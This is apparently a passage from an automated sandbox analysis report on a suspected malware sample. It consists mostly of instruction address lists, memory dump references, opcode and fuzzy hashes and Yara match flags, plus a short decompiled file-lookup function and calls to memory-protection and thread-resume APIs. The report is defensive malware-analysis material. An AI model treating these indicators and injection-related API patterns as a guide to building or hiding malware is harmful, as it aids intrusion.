                                                                                                                                                                            0x004067ff
                                                                                                                                                                            0x00406805
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x0040680a
                                                                                                                                                                            0x0040680d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686f
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00406875
                                                                                                                                                                            0x00406878
                                                                                                                                                                            0x0040687b
                                                                                                                                                                            0x0040687f
                                                                                                                                                                            0x00406882
                                                                                                                                                                            0x00406888
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040697a
                                                                                                                                                                            0x0040697e
                                                                                                                                                                            0x004069a0
                                                                                                                                                                            0x004069a3
                                                                                                                                                                            0x004069ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004069ad
                                                                                                                                                                            0x00406980
                                                                                                                                                                            0x00406983
                                                                                                                                                                            0x00406987
                                                                                                                                                                            0x0040698a
                                                                                                                                                                            0x0040698a
                                                                                                                                                                            0x0040698d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a37
                                                                                                                                                                            0x00406a3b
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a60
                                                                                                                                                                            0x00406a67
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a3d
                                                                                                                                                                            0x00406a40
                                                                                                                                                                            0x00406a43
                                                                                                                                                                            0x00406a46
                                                                                                                                                                            0x00406a4d
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406994
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b28
                                                                                                                                                                            0x00406b2b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406762
                                                                                                                                                                            0x00406764
                                                                                                                                                                            0x0040676b
                                                                                                                                                                            0x0040676c
                                                                                                                                                                            0x0040676e
                                                                                                                                                                            0x00406771
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406779
                                                                                                                                                                            0x0040677c
                                                                                                                                                                            0x0040677f
                                                                                                                                                                            0x00406781
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406784
                                                                                                                                                                            0x00406787
                                                                                                                                                                            0x0040678e
                                                                                                                                                                            0x00406791
                                                                                                                                                                            0x0040679f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a78
                                                                                                                                                                            0x00406a7f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a88
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00406a8e
                                                                                                                                                                            0x00406a91
                                                                                                                                                                            0x00406a94
                                                                                                                                                                            0x00406a98
                                                                                                                                                                            0x00406a9b
                                                                                                                                                                            0x00406aa1
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa6
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406ab0
                                                                                                                                                                            0x00406b10
                                                                                                                                                                            0x00406b13
                                                                                                                                                                            0x00406b18
                                                                                                                                                                            0x00406b19
                                                                                                                                                                            0x00406b1b
                                                                                                                                                                            0x00406b1d
                                                                                                                                                                            0x00406b20
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b20
                                                                                                                                                                            0x00406ab2
                                                                                                                                                                            0x00406ab8
                                                                                                                                                                            0x00406abb
                                                                                                                                                                            0x00406abe
                                                                                                                                                                            0x00406ac1
                                                                                                                                                                            0x00406ac4
                                                                                                                                                                            0x00406ac7
                                                                                                                                                                            0x00406aca
                                                                                                                                                                            0x00406acd
                                                                                                                                                                            0x00406ad0
                                                                                                                                                                            0x00406ad3
                                                                                                                                                                            0x00406aec
                                                                                                                                                                            0x00406aef
                                                                                                                                                                            0x00406af2
                                                                                                                                                                            0x00406af5
                                                                                                                                                                            0x00406af9
                                                                                                                                                                            0x00406afb
                                                                                                                                                                            0x00406afb
                                                                                                                                                                            0x00406afc
                                                                                                                                                                            0x00406aff
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406add
                                                                                                                                                                            0x00406ae2
                                                                                                                                                                            0x00406ae4
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406b02
                                                                                                                                                                            0x00406b09
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004067a7
                                                                                                                                                                            0x004067aa
                                                                                                                                                                            0x004067e0
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406916
                                                                                                                                                                            0x00406918
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x0040691e
                                                                                                                                                                            0x00406921
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406927
                                                                                                                                                                            0x0040692b
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x004067ac
                                                                                                                                                                            0x004067ae
                                                                                                                                                                            0x004067b0
                                                                                                                                                                            0x004067b2
                                                                                                                                                                            0x004067b5
                                                                                                                                                                            0x004067b6
                                                                                                                                                                            0x004067b8
                                                                                                                                                                            0x004067ba
                                                                                                                                                                            0x004067bd
                                                                                                                                                                            0x004067c0
                                                                                                                                                                            0x004067d6
                                                                                                                                                                            0x004067db
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406817
                                                                                                                                                                            0x00406843
                                                                                                                                                                            0x00406845
                                                                                                                                                                            0x0040684c
                                                                                                                                                                            0x0040684f
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406859
                                                                                                                                                                            0x0040685c
                                                                                                                                                                            0x00406863
                                                                                                                                                                            0x00406866
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406896
                                                                                                                                                                            0x00406899
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x004068a1
                                                                                                                                                                            0x004068a4
                                                                                                                                                                            0x004068a7
                                                                                                                                                                            0x004068aa
                                                                                                                                                                            0x004068ad
                                                                                                                                                                            0x004068b0
                                                                                                                                                                            0x004068b3
                                                                                                                                                                            0x004068b6
                                                                                                                                                                            0x004068b9
                                                                                                                                                                            0x004068bc
                                                                                                                                                                            0x004068d5
                                                                                                                                                                            0x004068d7
                                                                                                                                                                            0x004068da
                                                                                                                                                                            0x004068db
                                                                                                                                                                            0x004068de
                                                                                                                                                                            0x004068e0
                                                                                                                                                                            0x004068e3
                                                                                                                                                                            0x004068e5
                                                                                                                                                                            0x004068e7
                                                                                                                                                                            0x004068ea
                                                                                                                                                                            0x004068ec
                                                                                                                                                                            0x004068ef
                                                                                                                                                                            0x004068f3
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f6
                                                                                                                                                                            0x004068f9
                                                                                                                                                                            0x004068fc
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068c6
                                                                                                                                                                            0x004068cb
                                                                                                                                                                            0x004068cd
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068ff
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x0040681c
                                                                                                                                                                            0x0040681e
                                                                                                                                                                            0x00406821
                                                                                                                                                                            0x00406824
                                                                                                                                                                            0x00406827
                                                                                                                                                                            0x00406829
                                                                                                                                                                            0x0040682c
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406835
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b8
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066c1
                                                                                                                                                                            0x004066c4
                                                                                                                                                                            0x004066c7
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066cc
                                                                                                                                                                            0x004066cf
                                                                                                                                                                            0x004066d2
                                                                                                                                                                            0x004066d5
                                                                                                                                                                            0x004066d8
                                                                                                                                                                            0x004066db
                                                                                                                                                                            0x004066dc
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066e1
                                                                                                                                                                            0x004066e4
                                                                                                                                                                            0x004066e7
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ed
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                                                                                                                                                            • Instruction ID: a8746b25a1c6b49bbeafbf020c2dfcaa04563a9eac1a8e827fb2969916571183
                                                                                                                                                                            • Opcode Fuzzy Hash: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                                                                                                                                                            • Instruction Fuzzy Hash: 70F17670D00229CBCF18CFA8C8946ADBBB1FF44305F25816ED856BB281D7786A96CF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405FFD(CHAR* _a4) {
                                                                                                                                                                            				void* _t2;
                                                                                                                                                                            
                                                                                                                                                                            				_t2 = FindFirstFileA(_a4, 0x421558); // executed
                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				FindClose(_t2);
                                                                                                                                                                            				return 0x421558;
                                                                                                                                                                            			}




                                                                                                                                                                            0x00406008
                                                                                                                                                                            0x00406011
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040601e
                                                                                                                                                                            0x00406014
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileA.KERNELBASE(76803410,00421558,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,0040589C,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\), ref: 00406008
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406014
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsl1543.tmp, xrefs: 00405FFD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsl1543.tmp
                                                                                                                                                                            • API String ID: 2295610775-180426900
                                                                                                                                                                            • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                                                                                                                                                            • Instruction ID: 1297c1e42099762feae64532f60583430090df1d404adb2e37743a0561846f6f
                                                                                                                                                                            • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CD012319491206BC3105B38AD0C85B7A599F593317118A33F567F52F0C7788C7296E9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileA.KERNELBASE(?,22D9F58C,00000030,-7E3C06B3), ref: 03340ECE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: e9e63de741f7a507dba4ef231299757c2fd3b58ebf9760b3813fc48e2623376a
                                                                                                                                                                            • Instruction ID: 082f69f0c51c7ac183c750dcbfc8ba7db25219535a3440429f65c59307d66c7e
                                                                                                                                                                            • Opcode Fuzzy Hash: e9e63de741f7a507dba4ef231299757c2fd3b58ebf9760b3813fc48e2623376a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B317B715093069FCB249E38C9E47DABBF2AF57390F49021DCCC157596C7B00A46CB06
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL(-00000001DE8B2009,?,?,?,?,0334427F,-B26A7097,-143BFC76), ref: 0334535C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                                                            • Opcode ID: bbc21c774146a77e315cb312fdc0480e9b92858444c0de741249711b752ba5d9
                                                                                                                                                                            • Instruction ID: e9edfed91560a917d7aaabcc7be21dd599a1284afe70b42606110784e034649e
                                                                                                                                                                            • Opcode Fuzzy Hash: bbc21c774146a77e315cb312fdc0480e9b92858444c0de741249711b752ba5d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01C8B47443869FDB38CE68DDD4BEA77A5AF88304F44812DAD4A8B646C77059028A15
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtResumeThread.NTDLL(00000001,03347052,A12D4927,00000000), ref: 0334672B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                            • Opcode ID: e23c208feb7a2e3f7f8caf6a5e9231b6cad8f4bc1a4ed30c34a4dd0136d113ce
                                                                                                                                                                            • Instruction ID: 3f6772709e06edba21058f26141b5fc047da5077fbdb44e47dd57ec053e5d44e
                                                                                                                                                                            • Opcode Fuzzy Hash: e23c208feb7a2e3f7f8caf6a5e9231b6cad8f4bc1a4ed30c34a4dd0136d113ce
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F018171604645CFCB29CF758AD62EE7BE9AFCA304F11817ADD06CBA04D734F9498A10
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ad0fd58be39cbf47abc8bdfdf67596cb4720ba4fb607a8a6c2dc178f17e816f4
                                                                                                                                                                            • Instruction ID: 6ecec547367338320d98f765c9386a58ad8939925562ca66e9e8230c6e1ec035
                                                                                                                                                                            • Opcode Fuzzy Hash: ad0fd58be39cbf47abc8bdfdf67596cb4720ba4fb607a8a6c2dc178f17e816f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 28321474F093078BCB30AE349AA23D77BA3AF81394F648529CCC55B656D771998387C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4cb61d5a63a28e004972ac481cbb6be7b78804ce34e7ae90382bdd0ac77cdc31
                                                                                                                                                                            • Instruction ID: 3911b54d31fe8ed7c03113f457b152aa07c19c4a4164e61b61db7a31aded2dae
                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb61d5a63a28e004972ac481cbb6be7b78804ce34e7ae90382bdd0ac77cdc31
                                                                                                                                                                            • Instruction Fuzzy Hash: D3126630B083068FCB34AE389DA57DB7BA7AF96380F55492DDCC59B255C7318982C782
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 42de48b6e59063c103d567b0278ba2ce1aff936abc064a21591b06f2e2adb0a1
                                                                                                                                                                            • Instruction ID: 81528a5dbc9140d1013121889dd0e1e821b252de51fb00bb5f2e613b95d59604
                                                                                                                                                                            • Opcode Fuzzy Hash: 42de48b6e59063c103d567b0278ba2ce1aff936abc064a21591b06f2e2adb0a1
                                                                                                                                                                            • Instruction Fuzzy Hash: C4E19975A0035A8FDB34DF288DA47DB77E6EF95360F99862EDC898B640D3309982C741
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 518130793aca291955a39f1c0dfd39310c7429701712ee67496ee288ebb15cf0
                                                                                                                                                                            • Instruction ID: 9cca8ad0d2b289bcc251b00ab780ae8b3aacc579d514f87b928b1b6a6ddfb2c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 518130793aca291955a39f1c0dfd39310c7429701712ee67496ee288ebb15cf0
                                                                                                                                                                            • Instruction Fuzzy Hash: E6B1687660030A9BDB34AF2CCDA87DB37E6EF55790F91422EDC89DB644D3319A428B01
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 531a573c5400783f47d929a50aeae5a207f84ce73ec5634ba1b2780b09a2cd74
                                                                                                                                                                            • Instruction ID: 8019376bac539cbd427ae6daa494701603586b2fc7d5dc47dcc8b0ada0b86e6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 531a573c5400783f47d929a50aeae5a207f84ce73ec5634ba1b2780b09a2cd74
                                                                                                                                                                            • Instruction Fuzzy Hash: CA915631F093478BCB30AE289AA53D7BBE2AF51390F50452DDCC59B255D771894387C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f900e8a11cc8a1bc9f191a555d38eca2351d5c3f9b070b8337c4e9507668bb61
